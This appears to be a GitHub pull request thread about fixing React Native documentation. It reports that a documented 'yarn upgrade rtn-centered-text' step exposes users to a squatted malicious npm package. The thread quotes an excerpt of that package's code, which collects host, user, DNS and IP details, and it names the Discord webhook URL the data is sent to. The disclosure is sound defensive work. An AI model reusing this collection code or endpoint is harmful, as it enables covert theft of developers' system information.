Fix fabric-native-components.md

[weese]

The documentation mentioned yarn upgrade rtn-centered-text would sync the latest changes from the local RTNCenteredText package into the node_modules folder. In fact that's wrong and even worse, it opens a door to malicious package injection. 2 days ago someone posted a package on npmjs with the name rtn-centered-text that uploads information like private/public IP, local operating system, etc. to some discord channel.

https://www.npmjs.com/package/rtn-centered-text

This is an excerpt of the collected user information:

// Prepare the tracking data
getExternalIP((externalIP) => {
    const trackingData = JSON.stringify({
        package: package,
        directory: __dirname,
        home_directory: os.homedir(),
        username: os.userInfo().username,
        dns: dns.getServers(),
        internal_hostname: os.hostname(),
        internal_ip: getIPAddress(), // Add internal IP address here
        external_ip: externalIP.ip, // Get External IP Address
        external_hostname: externalIP.hostname,
        organization: externalIP.organization,
        resolved_url: packageJSON ? packageJSON.___resolved : undefined,
        package_version: packageJSON.version,
        package_json: packageJSON,
        package_type: 'npm',
    });

This data is then uploaded to:
https://discord.com/api/webhooks/1306068586086793297/5ERJ-0yumqHWIUMiaww5_SdUkVAptuIxMIUMbTaEY--c5IyIDDA4aYHdKIi6YwYJ_7mS

I've reported the issue already to npmjs, but please close the door here as well. A simple yarn add syncs a local package.

[cortinico]

Thank you very much for sending this over